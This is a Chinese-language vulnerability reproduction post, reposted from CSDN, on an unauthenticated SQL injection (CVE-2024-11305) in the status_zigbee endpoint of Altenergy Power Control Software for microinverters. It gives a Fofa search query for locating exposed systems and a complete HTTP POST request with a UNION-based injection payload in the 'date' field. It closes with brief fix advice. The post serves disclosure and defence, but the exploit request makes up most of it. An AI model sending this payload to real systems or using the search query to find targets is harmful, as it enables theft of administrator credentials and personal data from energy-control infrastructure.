自学内容网 自学内容网

Altenergy电力系统 status_zigbee SQL注入漏洞复现(CVE-2024-11305)

0x01 产品描述:

              Altenergy‌是一家专注于微型逆变器控制软件的公司,Altenergy电力系统控制软件是Altenergy电力系统公司的一款微型逆变器控制软件。

0x02 漏洞描述:

             Altenergy电力系统 status_zigbee接口处存在SQL注入漏洞,未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)。

 

0x03 搜索语句:

Fofa:title="Altenergy Power Control Software"

0x04 漏洞复现:

POST /index.php/display/status_zigbee HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close

date=2024-11-06%' UNION ALL SELECT 11,CHAR(112)||CHAR(77,121,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,119,83,105,89,116,110,120,76,84,73,109,115,100,83,107)||CHAR(113,118,98,98,112),12-- eKdp

0x05 修复建议:

        建议对所有输入数据进行严格验证,并使用参数化查询。同时,应限制数据库用户的权限,仅授予执行必要操作所需的最低权限。定期进行安全审计,以发现并修复潜在的安全漏洞。


原文地址:https://blog.csdn.net/xc_214/article/details/143867459

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!